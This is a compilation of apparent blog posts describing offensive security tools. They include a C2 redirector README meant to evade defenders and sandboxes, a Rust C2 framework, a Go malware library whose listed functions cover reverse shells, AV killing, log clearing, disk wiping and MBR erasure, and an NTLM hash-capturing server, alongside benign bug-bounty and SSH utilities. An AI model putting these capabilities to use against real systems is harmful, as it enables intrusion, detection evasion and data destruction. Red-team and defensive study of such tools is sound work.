Should any invalid inbound packet reach RedWarden - you can redirect, reset or just proxy it away!


Abstract

This program acts as an HTTP/HTTPS reverse-proxy with several restrictions imposed upon inbound C2 HTTP requests, selecting which packets to direct to the Teamserver and which to drop, similarly to the .htaccess file restrictions mandated in Apache2's mod_rewrite.

RedWarden was created to solve the problem of IR/AV/EDRs/Sandboxes evasion on the C2 redirector layer. It's intended to supersede classical Apache2 + mod_rewrite setups used for that purpose.

Features:

  • Malleable C2 Profile parser able to validate inbound HTTP/S requests strictly according to malleable's contract and drop outlaying packets in case of violation (Malleable Profiles 4.0+ with variants covered)
  • Ability to unfilter/repair unexpected and unwanted HTTP headers added by interim systems such as proxies and caches (think CloudFlare) in order to conform to a valid Malleable contract.
  • Integrated curated massive blacklist of IPv4 pools and ranges known to be associated with IT Security vendors
  • Grepable output log entries (in both Apache2 combined access log and custom RedWarden formats) useful to track peer connectivity events/issues
  • Ability to query connecting peer's IPv4 address against IP Geolocation/whois information and confront that with predefined regular expressions to rule out peers connecting outside of trusted organizations/countries/cities etc.
  • Built-in Replay attacks mitigation enforced by logging accepted requests' MD5 hashsums into locally stored SQLite database and preventing requests previously accepted.
  • Allows to define ProxyPass statements to pass requests matching specific URLs onto other Hosts
  • Support for multiple Teamservers
  • Support for many reverse-proxying Hosts/redirection sites given in a randomized order - which lets you load-balance traffic or build more versatile infrastructures
  • Can repair HTTP packets according to expected malleable contract in case some of the headers were corrupted in traffic
  • Sleepless nights spent on troubleshooting "why my Beacon doesn't work over CloudFlare/CDN/Domain Fronting" are over now thanks to detailed verbose HTTP(S) requests/responses logs

RedWarden takes a Malleable C2 profile and the teamserver's hostname:port as its input. It then parses the supplied malleable profile sections to understand the contract, and passes through only those inbound requests that satisfy it while misdirecting others.

Sections such as http-stager, http-get, http-post and their corresponding uris, headers, prepend/append patterns and User-Agent are all used to distinguish between a legitimate beacon request and unrelated Internet noise or IR/AV/EDR out-of-band packets.

The program benefits from the marvelous known-bad IP ranges coming from curi0usJack and others: https://gist.github.com/curi0usJack/971385e8334e189d93a6cb4671238b10

Using IP address blacklisting, along with known-bad keyword lookups through reverse-IP DNS queries and HTTP header inspection, considerably increases the redirector's resiliency against unauthorized peers wanting to examine attacker infrastructure.

Invalid packets may be misrouted according to three strategies:

  • redirect: Simply redirect the peer to another website, such as a Rick Roll.
  • reset: Kill TCP connection straightaway.
  • proxy: Fetch a response from another website, to mimic cloned/hijacked website as closely as possible.

This behaviour is configured in the configuration file:

#
# What to do with the request originating not conforming to Beacon, whitelisting or
# ProxyPass inclusive statements:
# - 'redirect' it to another host with (HTTP 301),
# - 'reset' a TCP connection with connecting client
# - 'proxy' the request, acting as a reverse-proxy against specified action_url
# (may be dangerous if client fetches something it shouldn't supposed to see!)
#
# Valid values: 'reset', 'redirect', 'proxy'.
#
# Default: redirect
#
drop_action: redirect

The example below shows the outcome of a redirect to https://googole.com:



Use wisely, stay safe.


Requirements

This program can run only on Linux systems as it uses fork to spawn multiple processes.

Also, the openssl system command is expected to be installed as it is used to generate SSL certificates.

Finally, install all of the Python3 PIP requirements easily with:

$ sudo pip3 install -r requirements.txt

Usage

Example usage

The minimal RedWarden's config.yaml configuration file could contain:

port:
- 80/http
- 443/https

profile: jquery-c2.3.14.profile

ssl_cacert: /etc/letsencrypt/live/attacker.com/fullchain.pem
ssl_cakey: /etc/letsencrypt/live/attacker.com/privkey.pem

teamserver_url:
- 1.2.3.4:8080

drop_action: reset

Then, the program can be launched by giving it a path to the config file:

$ sudo python3 RedWarden.py -c config.yaml

[INFO] 19:21:42: Loading 1 plugin...
[INFO] 19:21:42: Plugin "malleable_redirector" has been installed.
[INFO] 19:21:42: Preparing SSL certificates and keys for https traffic interception...
[INFO] 19:21:42: Using provided CA key file: ca-cert/ca.key
[INFO] 19:21:42: Using provided CA certificate file: ca-cert/ca.crt
[INFO] 19:21:42: Using provided Certificate key: ca-cert/cert.key
[INFO] 19:21:42: Serving http proxy on: 0.0.0.0, port: 80...
[INFO] 19:21:42: Serving https proxy on: 0.0.0.0, port: 443...
[INFO] 19:21:42: [REQUEST] GET /jquery-3.3.1.min.js
[INFO] 19:21:42: == Valid malleable http-get request inbound.
[INFO] 19:21:42: Plugin redirected request from [code.jquery.com] to [1.2.3.4:8080]
[INFO] 19:21:42: [RESPONSE] HTTP 200 OK, length: 5543
[INFO] 19:21:45: [REQUEST] GET /jquery-3.3.1.min.js
[INFO] 19:21:45: == Valid malleable http-get request inbound.
[INFO] 19:21:45: Plugin redirected request from [code.jquery.com] to [1.2.3.4:8080]
[INFO] 19:21:45: [RESPONSE] HTTP 200 OK, length: 5543
[INFO] 19:21:46: [REQUEST] GET /
[...]
[ERROR] 19:24:46: [DROP, reason:1] inbound User-Agent differs from the one defined in C2 profile.
[...]
[INFO] 19:24:46: [RESPONSE] HTTP 301 Moved Permanently, length: 212
[INFO] 19:24:48: [REQUEST] GET /jquery-3.3.1.min.js
[INFO] 19:24:48: == Valid malleable http-get request inbound.
[INFO] 19:24:48: Plugin redirected request from [code.jquery.com] to [1.2.3.4:8080]
[...]

The above output contains a line pointing out that there was an unauthorized inbound request, not compliant with our C2 profile, which got dropped due to the incompatible User-Agent string presented:

  [...]
[DROP, reason:1] inbound User-Agent differs from the one defined in C2 profile.
[...]

Use Cases

Impose IP Geolocation on your Beacon traffic originators

You've done your Pre-Phish and OSINT very well. You now know where your targets live and have some clues where traffic should be originating from, or at least how to detect completely auxiliary traffic. How to impose IP Geolocation on Beacon requests on a redirector?

RedWarden comes at help!

Let's say, you want only to accept traffic originating from Poland, Europe. Your Pre-Phish/OSINT results indicate that:

  • 89.64.64.150 is a legitimate IP of one of your targets, originating from Poland
  • 59.99.140.76 whereas this one is not and it reached your systems as a regular Internet noise packet.

You can use RedWarden's utility lib/ipLookupHelper.py to collect IP Geo metadata about these two addresses:

$ python3 ipLookupHelper.py

Usage: ./ipLookupHelper.py <ipaddress> [malleable-redirector-config]

Use this small utility to collect IP Lookup details on your target IPv4 address and verify whether
your 'ip_geolocation_requirements' section of proxy2 malleable-redirector-config.yaml would match that
IP address. If second param is not given - no

The former brings:

$ python3 ipLookupHelper.py 89.64.64.150
[dbg] Following IP Lookup providers will be used: ['ip_api_com', 'ipapi_co']
[.] Lookup of: 89.64.64.150
[dbg] Calling IP Lookup provider: ipapi_co
[dbg] Calling IP Lookup provider: ip_api_com
[dbg] New IP lookup entry cached: 89.64.64.150
[.] Output:
{
"organization": [
"UPC Polska Sp. z o.o.",
"UPC.pl",
"AS6830 Liberty Global B.V."
],
"continent": "Europe",
"continent_code": "EU",
"country": "Poland",
"country_code": "PL",
"ip": "89.64.64.150",
"city": "Warsaw",
"timezone": "Europe/Warsaw",
"fulldata": {
"status": "success",
"country": "Poland",
"countryCode": "PL",
"region": "14",
"regionName": "Mazovia",
"city": "Warsaw",
"zip": "00-202",
"lat": 52.2484,
"lon": 21.0026,
"timezone": "Europe/Warsaw",
"isp": "UPC.pl",
"or g": "UPC Polska Sp. z o.o.",
"as": "AS6830 Liberty Global B.V.",
"query": "89.64.64.150"
},
"reverse_ip": "89-64-64-150.dynamic.chello.pl"
}

and the latter gives:

$ python3 ipLookupHelper.py 59.99.140.76
[dbg] Following IP Lookup providers will be used: ['ip_api_com', 'ipapi_co']
[dbg] Read 1 cached entries from file.
[.] Lookup of: 59.99.140.76
[dbg] Calling IP Lookup provider: ip_api_com
[dbg] New IP lookup entry cached: 59.99.140.76
[.] Output:
{
"organization": [
"",
"BSNL Internet",
"AS9829 National Internet Backbone"
],
"continent": "Asia",
"continent_code": "AS",
"country": "India",
"country_code": "IN",
"ip": "59.99.140.76",
"city": "Palakkad",
"timezone": "Asia/Kolkata",
"fulldata": {
"status": "success",
"country": "India",
"countryCode": "IN",
"region": "KL",
"regionName": "Kerala",
"city": "Palakkad",
"zip": "678001",
"lat": 10.7739,
"lon": 76.6487,
"timezone": "Asia/Kolkata",
"isp": "BSNL Internet",
"org": "",
"as": "AS9829 National Internet Backbone",
"query": "59.99.140.76"
},
"reverse_ip": ""
}

Now you see that the former one had "country": "Poland" whereas the latter had "country": "India". With that knowledge we are ready to devise our constraints in the form of a hefty YAML dictionary:

ip_geolocation_requirements:
  organization:
  continent:
  continent_code:
  country:
    - Poland
    - PL
    - Polska
  country_code:
  city:
  timezone:

Each of that dictionary's entries accepts a regular expression to be matched against the determined IP Geo metadata of the inbound peer's IP address. We use three entries in the country property to allow requests having one of the specified values.

Having that set in your configuration, you can verify whether another IP address would get passed through RedWarden's IP Geolocation discriminator by giving the ipLookupHelper utility a second parameter:



The very last line tells you whether packet would be blocked or accepted.

And that's all! Configure your IP Geolocation constraints wisely and safely, carefully inspect RedWarden logs for any IP Geo-related DROP entries and keep your C2 traffic nice and tidy!


Repair tampered Beacon requests

If you happen to use interim systems such as AWS Lambda or CloudFlare as your Domain Fronting / redirectors, you have surely come across a situation where some of your packets couldn't get accepted by the Teamserver as they deviated from the agreed malleable contract. Whether it was a tampered or removed HTTP header, reordered cookies or anything else - I bet that wasted plenty of hours of your life.

To combat C2 channels setup process issues and interim systems tamperings, RedWarden offers functionality to repair Beacon packets.

It does so by checking what the Malleable Profile expects a packet to look like, and can restore configured HTTP headers to their agreed values according to the profile's requirements.

Consider the following simple profile:

http-get {
set uri "/api/abc";
client {

header "Accept-Encoding" "gzip, deflate";

metadata {
base64url;
netbios;
base64url;
parameter "auth";
}
}
...

You see this Accept-Encoding? Every Beacon request has to come with that header and that value. What happens if your Beacon hits CloudFlare systems and they emit a request stripped of that header, or carrying Accept-Encoding: gzip instead? The Teamserver will drop the request on the spot.

By listing this header in the RedWarden configuration section dubbed protect_these_headers_from_tampering, you can save your connection:

#
# If RedWarden validates inbound request's HTTP headers, according to policy drop_malleable_without_expected_header_value:
# "[IP: DROP, reason:6] HTTP request did not contain expected header value:"
#
# and senses some header is missing or was overwritten along the wire, the request will be dropped. We can relax this policy
# a bit however, since there are situations in which Cache systems (such as Cloudflare) could tamper with our requests thus
# breaking Malleable contracts. What we can do is to specify list of headers, that should be overwritten back to their values
# defined in provided Malleable profile.
#
# So for example, if our profile expects:
# header "Accept-Encoding" "gzip, deflate";
#
# but we receive a request having following header set instead:
# Accept-Encoding: gzip
#
# Because it was tampered along the wire by some of the interim systems (such as web-proxies or caches), we can
# detect that and set that header's value back to what was expected in Malleable profile.
#
# In order to protect Accept-Encoding header, as an example, the following configuration could be used:
# protect_these_headers_from_tampering:
# - Accept-Encoding
#
#
# Default: <empty-list>
#
protect_these_headers_from_tampering:
- Accept-Encoding

Example outputs

Let's take a look at the output the proxy produces.

Under the verbose: True option, the verbosity will be set to INFO at most, telling accepted requests from dropped ones.

The request may be accepted if it conforms to all of the criteria configured in RedWarden's configuration file. Such a situation will be followed by an [ALLOW, ...] log entry:

[INFO] 2021-04-24/17:30:48: [REQUEST] GET /js/scripts.js
[INFO] 2021-04-24/17:30:48: == Valid malleable http-get (variant: default) request inbound.
[INFO] 2021-04-24/17:30:48: [ALLOW, 2021-04-24/19:30:48, 111.222.223.224] "/js/scripts.js" - UA: "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
[INFO] 2021-04-24/17:30:48: Connected peer sent 2 valid http-get and 0 valid http-post requests so far, out of 15/5 required to consider him temporarily trusted
[INFO] 2021-04-24/17:30:48: Plugin redirected request from [attacker.com] to [127.0.0.1:5555]

Should the request fail any of the checks RedWarden carries out on each request, a corresponding [DROP, ...] line will be emitted containing information about the drop reason:

[INFO] 2021-04-24/16:48:28: [REQUEST] GET /
[ERROR] 2021-04-24/16:48:29: [DROP, 2021-04-24/18:48:28, reason:1, 128.14.211.186] inbound User-Agent differs from the one defined in C2 profile.
[INFO] 2021-04-24/16:48:29: [DROP, 2021-04-24/18:48:28, 128.14.211.186] "/" - UA: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
[ERROR] 2021-04-24/16:48:29: [REDIRECTING invalid request from 128.14.211.186 (zl-dal-us-gp3-wk107.internet-census.org)] GET /

Drop Policies Fine-Tuning

There are plenty of reasons dictating whether a request gets dropped. Each of these checks can be independently turned on and off according to requirements, in a process of fine-tuning, or to fix erroneous decisions:

Excerpt from example-config.yaml:

#
# Fine-grained requests dropping policy - lets you decide which checks
# you want to have enforced and which to skip by setting them to False
#
# Default: all checks enabled
#
policy:
  # [IP: ALLOW, reason:0] Request conforms ProxyPass entry (url="..." host="..."). Passing request to specified host
  allow_proxy_pass: True
  # [IP: ALLOW, reason:2] Peer's IP was added dynamically to a whitelist based on a number of allowed requests
  allow_dynamic_peer_whitelisting: True
  # [IP: DROP, reason:1] inbound User-Agent differs from the one defined in C2 profile.
  drop_invalid_useragent: True
  # [IP: DROP, reason:2] HTTP header name contained banned word
  drop_http_banned_header_names: True
  # [IP: DROP, reason:3] HTTP header value contained banned word:
  drop_http_banned_header_value: True
  # [IP: DROP, reason:4b] peer's reverse-IP lookup contained banned word
  drop_dangerous_ip_reverse_lookup: True
  # [IP: DROP, reason:4e] Peer's IP geolocation metadata contained banned keyword! Peer banned in generic fashion.
  drop_ipgeo_metadata_containing_banned_keywords: True
  # [IP: DROP, reason:5] HTTP request did not contain expected header
  drop_malleable_without_expected_header: True
  # [IP: DROP, reason:6] HTTP request did not contain expected header value:
  drop_malleable_without_expected_header_value: True
  # [IP: DROP, reason:7] HTTP request did not contain expected (metadata|id|output) section header:
  drop_malleable_without_expected_request_section: True
  # [IP: DROP, reason:8] HTTP request was expected to contain (metadata|id|output) section with parameter in URI:
  drop_malleable_without_request_section_in_uri: True
  # [IP: DROP, reason:9] Did not found prepend pattern:
  drop_malleable_without_prepend_pattern: True
  # [IP: DROP, reason:10] Did not found append pattern:
  drop_malleable_without_apppend_pattern: True
  # [IP: DROP, reason:11] Requested URI does not aligns any of Malleable defined variants:
  drop_malleable_unknown_uris: True
  # [IP: DROP, reason:12] HTTP request was expected to contain <> section with URI-append containing prepend/append fragments
  drop_malleable_with_invalid_uri_append: True

By default all of these checks are enforced.

Turning on debug: True will swamp your console buffer with plenty of log lines describing each step RedWarden takes in its complex decisioning process. If you want to see full request and response bodies - set debug and trace to true and get buried in the logging burden!


FAQ

- Can this program run without Malleable Profile?

Yes it can. However, the request inspection logic will be turned off; the rest should work fine: IP Geolocation enforcement, reverse-lookup logic, banned IPs list, etc.

- Can this program be easily adapted to other C2 frameworks as well? Like Mythic, Covenant, etc?

Easily - no. With some effort - yes. As I've described below, the tool is written badly, which will make adapting it to other C2s a pain. However, that's totally doable given some time and effort.

- My packets are getting dropped. Why?

Try to enable debug: True and trace: True to collect as many logs as possible. Then you would need to go through the logs and inspect what's going on. Do the packets look exactly how you expected them in your Malleable profile? Or maybe there was a subtle tampering along the network that causes RedWarden to drop the packet (and could it make the Teamserver drop it as well?).


Known Issues
  • It may add a slight overhead to the interactive sleep throughput
  • ProxyPass processing logic is far from perfect and is really buggy (and oh boy, it's ugly!).
  • Weird forms of configuration files can derail the RedWarden parser and make it complain. The easiest way to overcome this is to copy example-config.yaml and work on it instead.

Oh my god why is this code such an engineerical piece of crap?

The code is ONE FUCKING BIG HELL OF A MESS - I admit that - and there's an honest reason for that too: the project was developed 90% during actual Red Team engagements. As we all know, these sorts of engagements entail so many things to do, leaving close to no time for proper, complex tool development. Not to mention the criticality of this program in a project's setup. The tool initially started as a simple proxy script written in Python2, then evolved into a proxy with plugins, received the malleable_redirector plugin - and since then I've been trying really hard to keep proxy2 backwards compatible (poor me, I was like Microsoft!) with the other plugins I've made for it and to stick to its original purpose.

Time has come though to let it go, rebrand it and start fixing all the bad code smells introduced.

With all that said, please do express some level of compassion for me when raising issues, submitting pull requests and try to help rather than judge! :-) Thanks!


TODO
  • Research possibility to use Threat Intelligence feeds for nefarious purposes - like for instance detecting Security Vendors based on IPs
  • Add support for MaxMind GeoIP database/API
  • Implement support for JA3 signatures in both detection & blocking and impersonation to fake nginx/Apache2/custom setups.
  • Add some unique beacon tracking logic to offer the flexibility of refusing staging and communication processes at the proxy's own discretion
  • Introduce a time-of-day constraint when offering redirection capabilities (proxy only during office hours)
  • Add Proxy authentication and authorization logic on CONNECT/relay.
  • Add Mobile users targeted redirection
  • Add configuration options to define custom HTTP headers to be injected, or ones to be removed
  • Add configuration options to require specific HTTP headers to be present in requests passing ProxyPass criteria.
  • Interactive interface allowing to type simple characters controlling output logging verbosity, similarly to Nmap's
  • Rewrite Malleable profile parser logic to pyMalleableC2. When I first started coding my own parser logic, there was no such toolkit on Github.
  • Refactor all the codebase

Author
Mariusz B. / mgeeky, '19-'21
<mb@binary-offensive.com>



Totp-Ssh-Fluxer - Take Security By Obscurity To The Next Level (This Is A Bad Idea, Don't Really Use This Please)



Some people change their SSH port on their servers so that it is slightly harder to find for bots or other nasties, and while that is generally viewed as a form of security through obscurity, it does work very well at killing a lot of the automated logins you always see in /var/log/auth.log.

However, what if we could take this to a ridiculous level? What if we could use the TOTP codes that are normally used as 2nd factor codes for website logins to actually know what port the sshd server is listening on?

For this, I present totp-ssh-flux, a way to make sure your sshd port changes every 30 seconds, possibly causing your adversaries a small period of frustration.


What you can see here is my phone (using a generic TOTP client) generating codes that I can then use as the port to SSH into on a server.

The software behind it is fairly simple. It runs in a loop that does the following:

  • Generates a TOTP token
  • Takes the last digits; if the result is above 65536, does that again
  • Adds an iptables PREROUTING rule redirecting the port number generated above to the real sshd port
  • Waits 30 seconds, removes that rule, repeats.

The neat thing is, because this is done in PREROUTING, even if the code expires, established connections stay connected.
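A minimal sketch of that loop in Go is shown below. This is not the project's actual code: the TOTP library (github.com/pquerna/otp/totp), the hard-coded secret, and the way the "do that again" retry is derived are all assumptions made for illustration.

package main

import (
	"fmt"
	"os/exec"
	"strconv"
	"time"

	"github.com/pquerna/otp/totp"
)

const secret = "JBSWY3DPEHPK3PXP" // hypothetical shared TOTP secret

// portFor turns a TOTP code into a usable TCP port, retrying until the
// code falls inside the valid port range (the "do that again" step).
func portFor(t time.Time) int {
	for {
		code, err := totp.GenerateCode(secret, t)
		if err != nil {
			panic(err)
		}
		if n, _ := strconv.Atoi(code); n > 0 && n < 65536 {
			return n
		}
		t = t.Add(30 * time.Second) // assumption: retry against the next time window
	}
}

func main() {
	for {
		port := portFor(time.Now())
		rule := []string{"-t", "nat", "-A", "PREROUTING", "-p", "tcp",
			"--dport", strconv.Itoa(port), "-j", "REDIRECT", "--to-port", "22"}
		exec.Command("iptables", rule...).Run() // insert the redirect rule
		fmt.Println("sshd now reachable on port", port)
		time.Sleep(30 * time.Second)
		rule[2] = "-D" // flip -A to -D to delete the very same rule
		exec.Command("iptables", rule...).Run()
	}
}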


Installation

You will most likely find more up to date instructions on the totp-ssh-flux project readme

Beware, currently I would not really recommend running this software, it was only written as a joke.

At the time of writing the project is just a single file; you will need to install golang and then go get and go build it.

Run the program as root (it needs to, sorry - it's editing iptables).

Upon first run, the program will generate a token for the host in /etc/ssh-flux-key (you can use the -keypath option to change that) and you can input that into your phone or other clients.

You can confirm it works by running watch iptables -vL -t nat and waiting for the iptables rules to be inserted and removed.


Want to see more insanity like this? Follow me on twitter: @benjojo12




Link - A Command And Control Framework Written In Rust



link is a command and control framework written in rust. Currently in beta.


Introduction

link provides MacOS, Linux and Windows implants which may lack the necessary evasive tradecraft provided by other more mature command and control frameworks.

Tested on Linux only.


Features

Hopefully this list expands enough for humans to actually want to use this:

  • HTTPS communication
  • Process injection
  • In-memory .NET assembly execution
  • SharpCollection tools
  • sRDI implementation for shellcode generation
  • Windows link reloads DLLs from disk into current process

Feedback

Feel free to file an issue.


Build Process
  • Clone or download the repo
  • cargo run if you are eager to run it right now
  • cargo build --release to build the link server executable

For more information check out Installation and Usage.


Acknowledgments

A non-exhaustive list of those who have in some way inspired this project by means of writing code, snippets, ideas or inspiration:

@rust
@moloch--
@djhohnstein
@lesnuages
@Flangvik
@monoxgas
@b4rtik



ColdFire - Golang Malware Development Library



Golang malware development framework


Introduction

ColdFire provides various methods useful for malware development in Golang.

Most functions are compatible with both Linux and Windows operating systems.


Installation

go get github.com/redcode-labs/ColdFire
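A minimal usage sketch, using only functions documented below (the import path comes from the installation command; the cf alias and the overall flow are illustrative, not taken from the project's examples):

package main

import (
	cf "github.com/redcode-labs/ColdFire"
)

func main() {
	// Bail out if any of the sandbox-detection methods fires.
	if cf.SandboxAll() {
		return
	}
	cf.PrintInfo("local IP: " + cf.GetLocalIp())
	// Info() returns basic system information as a map (see documentation below).
	for key, value := range cf.Info() {
		cf.PrintInfo(key + ": " + value)
	}
}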


Types of functions included
  • Logging
  • Auxiliary
  • Reconnaissance
  • Evasion
  • Administration
  • Sandbox detection
  • Disruptive

Documentation

Logging functions
func F(s string, arg ...interface{}) string 
Alias for fmt.Sprintf

func PrintGood(msg string)
Print good status message

func PrintInfo(msg string)
Print info status message

func PrintError(msg string)
Print error status message

func PrintWarning(msg string)
Print warning status message


Auxiliary functions
func FileToSlice(file string) []string
Read from file and return slice with lines delimited with newline.

func Contains(s interface{}, elem interface{}) bool
Check if interface type contains another interface type.

func StrToInt(string_integer string) int
Convert string to int.

func IntToStr(i int) string
Converts int to string.

func IntervalToSeconds(interval string) int
Converts given time interval to seconds.

func RandomInt(min int, max int) int
Returns a random int from range.

func RandomSelectStr(list []string) string
Returns a random selection from slice of strings.

func RandomSelectInt(list []int) int
Returns a random selection from slice of ints.

func RandomSelectStrNested(list [][]string) []string
Returns a random selection from nested string slice.

func RemoveNewlines(s string) string
Removes "\n" and "\r" characters from string.

func FullRemove(str string, to_remove string) string
Removes all occurrences of a substring.

func RemoveDuplicatesStr(slice []string) []string
Removes duplicates from string slice.

func RemoveDuplicatesInt(slice []int) []int
Removes duplicates from int slice.

func ContainsAny(str string, elements []string) bool
Returns true if slice contains a string.

func RandomString(n int) string
Generates random string of length [n]

func ExitOnError(e error)
Handle errors

func Md5Hash(str string) string
Returns MD5 checksum of a string

func MakeZip(zip_file string, files []string) error
Creates a zip archive from a list of files

func ReadFile(filename string) (string, error)
Read contents of a file.

func WriteFile(filename string) error
Write contents to a file.

func B64d(str string) string
Returns a base64 decoded string

func B64e(str string) string
Returns a base64 encoded string

func FileExists(file string) bool
Check if file exists.

func ParseCidr(cidr string) ([]string, error)
Returns a slice containing all possible IP addresses in the given range.


Reconnaissance functions

func GetLocalIp() string
Returns a local IP address of the machine.

func GetGlobalIp() string
Returns a global IP address of the machine.

func IsRoot() bool
Check if the user has administrative privileges.

func Processes() (map[int]string, error)
Returns all processes' PIDs and their corresponding names.

func Iface() (string, string)
Returns the name of the currently used wireless interface and its MAC address.

func Ifaces() []string
Returns slice containing names of all local interfaces.

func Disks() ([]string, error)
Lists local storage devices

func Users() ([]string, error)
Returns list of known users.

func Info() map[string]string
Returns basic system information.
Possible fields: username, hostname, go_os, os,
platform, cpu_num, kernel, core, local_ip, ap_ip, global_ip, mac.
If the field cannot be resolved, it defaults to "N/A" value.

func DnsLookup(hostname string) ([]string, error)
Performs DNS lookup

func RdnsLookup(ip string) ([]string, error)
Performs reverse DNS lookup

func HostsPassive(interval string) ([]string, error)
Passively discovers active hosts on a network using ARP monitoring.
Discovery time can be changed using <interval> argument.

func FilePermissions(filename string) (bool,bool)
Checks if file has read and write permissions.

func Portscan(target string, timeout, threads int) []int
Returns list of open ports on target.

func PortscanSingle(target string, port int) bool
Returns true if selected port is open.

func BannerGrab(target string, port int) (string, error)
Grabs a service banner string from a given port.

func Networks() ([]string, error)
Returns list of nearby wireless networks.


Administration functions
func CmdOut(command string) (string, error)
Execute a command and return its output.

func CmdOutPlatform(commands map[string]string) (string, error)
Executes commands in platform-aware mode.
For example, passing {"windows":"dir", "linux":"ls"} will execute a different command,
based on the platform the implant was launched on.

func CmdRun(command string)
Unlike CmdOut(), CmdRun does not return anything; it prints output and errors to STDOUT.

func CmdDir(dirs_cmd map[string]string) ([]string, error)
Executes commands in directory-aware mode.
For example, passing {"/etc" : "ls"} will execute command "ls" under /etc directory.

func CmdBlind(command string)
Run command without supervision, do not print any output.

func CreateUser(username, password string) error
Creates a new user on the system.

func Bind(port int)
Run a bind shell on a given port.

func Reverse(host string, port int)
Run a reverse shell.

func SendDataTcp(host string, port int, data string) error
Sends string to a remote host using TCP protocol.

func SendDataUdp(host string, port int, data string) error
Sends string to a remote host using UDP protocol.

func Download(url string) error
Downloads a file from url and saves it under the same name.

func CopyFile(src string, dst string) error
Copy a file from one place to another

func CurrentDirFiles() ([]string, error)
Returns list of files from current directory

Evasion functions
func PkillPid(pid int) error
Kill process by PID.

func PkillName(name string) error
Kill all processes that contain [name].

func PkillAv() error
Kill most common AV processes.

func Wait(interval string)
Does nothing for a given interval of time.

func Remove()
Removes binary from the host.

func SetTtl(interval string)
Set time-to-live of the binary.
Should be launched as goroutine.

func ClearLogs() error
Clears most system logs.

Sandbox detection functions
func SandboxFilepath() bool 
Detect sandbox by looking for common sandbox filepaths.
Compatible only with windows.

func SandboxProc() bool
Detect sandbox by looking for common sandbox processes.

func SandboxSleep() bool
Detect sandbox by looking for a sleep-acceleration mechanism.

func SandboxDisk(size int) bool
Detect sandbox by looking for abnormally small disk size.

func SandboxCpu(cores int) bool
Detect sandbox by looking for abnormally small number of cpu cores.

func SandboxRam(ram_mb int) bool
Detect sandbox by looking for abnormally small amount of RAM.

func SandboxMac() bool
Detect sandbox by looking for sandbox-specific MAC address of the localhost.

func SandboxUtc() bool
Detect sandbox by looking for properly set UTC time zone.

func SandboxProcnum(proc_num int) bool
Detect sandbox by looking for a small number of running processes.

func SandboxTmp(entries int) bool
Detect sandbox by looking for a small number of entries under the temporary dir.

func SandboxAll() bool
Detect sandbox using all sandbox detection methods.
Returns true if any sandbox-detection method returns true.

func SandboxAll_n(num int) bool
Detect sandbox using all sandbox detection methods.
Returns true if at least <num> detection methods return true.

Disruptive functions
func WifiDisconnect() error 
Disconnects from wireless access point

func Wipe() error
Wipes out entire filesystem.

func EraseMbr(device string, partition_table bool) error
Erases MBR sector of a device.
If <partition_table> is true, it also erases the partition table.

func Forkbomb()
Runs a forkbomb.

func Shutdown() error
Reboot the machine.


Requirements
"github.com/google/gopacket"
"github.com/google/gopacket/layers"
"github.com/google/gopacket/pcap"
"github.com/robfig/cron"
"github.com/anvie/port-scanner"
"github.com/matishsiao/goInfo"
"github.com/fatih/color"
"github.com/minio/minio/pkg/disk"
"github.com/dustin/go-humanize"
"github.com/mitchellh/go-ps"

Disclaimer

Developers are not responsible for any misuse regarding this tool. Use it only against systems that you are permitted to attack.



Bbscope - Scope Gathering Tool For HackerOne, Bugcrowd, And Intigriti!



The ultimate scope gathering tool for HackerOne, Bugcrowd, and Intigriti by sw33tLie.

Need to grep all the large scope domains that you've got on your bug bounty platforms? This is the right tool for the job.
What about getting a list of android apps that you are allowed to test? We've got you covered as well.

Reverse engineering god? No worries, you can get a list of binaries to analyze too :)


Installation

Make sure you have a recent version of the Go compiler installed on your system. Then just run:

GO111MODULE=on go get -u github.com/sw33tLie/bbscope

Usage
bbscope (h1|bc|it) -t <session-token> <other-flags>

How to get the session token:

  • HackerOne: login, then grab the __Host-session cookie
  • Bugcrowd: login, then grab the _crowdcontrol_session cookie
  • Intigriti: login, then intercept a request to api.intigriti.com and look for the Authentication: Bearer XXX header. XXX is your token

Remember that you can use the --help flag to get a description for all flags.


Examples

Below you'll find some example commands. Keep in mind that all of them work with Bugcrowd and Intigriti subcommands (bc and it) as well, not just with h1.
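For instance, the first example's Bugcrowd and Intigriti equivalents are simply the following (a sketch relying on the equivalence stated above; tokens are placeholders):

bbscope bc -t <YOUR_TOKEN> -b -o t
bbscope it -t <YOUR_TOKEN> -b -o t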


Print all in-scope targets from all your HackerOne programs that offer rewards
bbscope h1 -t <YOUR_TOKEN> -b -o t

The output will look like this:

app.example.com
*.user.example.com
*.demo.com
www.something.com

Print all in-scope targets from all your private HackerOne programs that offer rewards
bbscope h1 -t <YOUR_TOKEN> -b -p -o t

Print all in-scope Android APKs from all your HackerOne programs
bbscope h1 -t <YOUR_TOKEN> -o t -c android

Print all in-scope targets from all your HackerOne programs with extra data
bbscope h1 -t <YOUR_TOKEN> -o tdu -d ", "

This will print a list of in-scope targets from all your HackerOne programs (including public ones and VDPs) but, on the same line, it will also print the target description (when available) and the program's URL. It might look like this:

something.com, Something's main website, https://hackerone.com/something
*.demo.com, All assets owned by Demo are in scope, https://hackerone.com/demo

Get program URLs for your HackerOne private programs
bbscope h1 -t <YOUR_TOKEN> -o u -p | sort -u

You'll get a list like this:

https://hackerone.com/demo
https://hackerone.com/something

Beware of scope oddities

In an ideal world, all programs use the in-scope table in the same way to clearly show what's in scope, and make parsing easy. Unfortunately, that's not always the case.

Sometimes assets are assigned the wrong category. For example, if you're going after URLs using -c url, double-checking using -c all is often a good idea.

Other times, on HackerOne, you will find targets written in the scope description, instead of in the scope title. A few programs that do this are:

If you want to grep those URLs as well, you MUST include d in the printing options flag (-o).

Sometimes it gets even stranger: Spotify uses titles of the in-scope table to list wildcards, but then lists the actually in-scope subdomains in the targets description.

Human minds are weird and this tool does not attempt to parse nonsense; you'll have to do that manually (or bother people that can make this change, maybe?).


Thanks


SharpWebServer - HTTP And WebDAV Server With Net-NTLM Hashes Capture Functionality



A Red Team oriented simple HTTP & WebDAV server written in C# with functionality to capture Net-NTLM hashes. To be used for serving payloads on compromised machines for lateral movement purposes.

Requires .NET Framework 4.5 and System.Net and System.Net.Sockets references.


Usage
    :: SharpWebServer ::
a Red Team oriented C# Simple HTTP Server with Net-NTLMv1/2 hashes capture functionality

Authors:
- Can Güney Aksakalli (github.com/aksakalli) - original implementation
- harrypatrick442 (github.com/harrypatrick442) - aksakalli's fork & changes
